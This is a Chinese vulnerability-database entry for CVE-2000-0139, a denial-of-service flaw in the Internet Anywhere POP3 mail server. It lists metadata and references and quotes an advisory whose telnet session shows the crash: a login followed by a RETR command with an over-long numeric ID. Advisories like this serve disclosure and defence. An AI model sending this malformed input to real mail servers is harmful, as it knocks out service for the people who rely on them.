Internet Anywhere邮件服务器RETR拒绝服务漏洞-安全小百科

Internet Anywhere邮件服务器RETR拒绝服务漏洞

漏洞ID	1105707	漏洞类型	其他
发布时间	2000-02-10	更新时间	2005-07-27
CVE编号	CVE-2000-0139	CNNVD-ID	CNNVD-199912-026
漏洞平台	Windows	CVSS评分	2.1

|漏洞来源

https://www.exploit-db.com/exploits/19748
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-026

|漏洞详情

InternetAnywherePOP3邮件服务器存在漏洞。本地用户借助畸形RETR命令引发拒绝服务。

|漏洞EXP

source: http://www.securityfocus.com/bid/982/info


Submitting a RETR command with a message ID argument longer than 10 numeric characters will result in a crash of the Internet Anywhere Mail Server. A Doctor Watson error message will appear reporting an access violation by MailServer.exe. Restarting the mail server will resume functionality. This denial of service attack does not affect other running programs, and requires the attacker to have a valid username and password on the POP3 server. 

telnet target 110
+OK POP3 Welcome to someco.com using the Internet Anywhere Mail Server Version:3.1.3. Build: 1065 by True North Software, Inc. <[email protected]>
user username
+OK valid
pass password
+OK Authorized
RETR 11111111111

|参考资料

来源:BID
名称:982
链接:http://www.securityfocus.com/bid/982
来源:BUGTRAQ
名称:20000210remoteDoSonInternetAnywhereMailServerVer.3.1.3
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=95021326417936&w;=2

相关推荐: WordPress Multiple Cross-Site Scripting and SQL Injection Vulnerabilities

WordPress Multiple Cross-Site Scripting and SQL Injection Vulnerabilities 漏洞ID 1097399 漏洞类型 Input Validation Error 发布时间 2004-12-21…

文章版权归作者所有，未经允许请勿转载。

THE END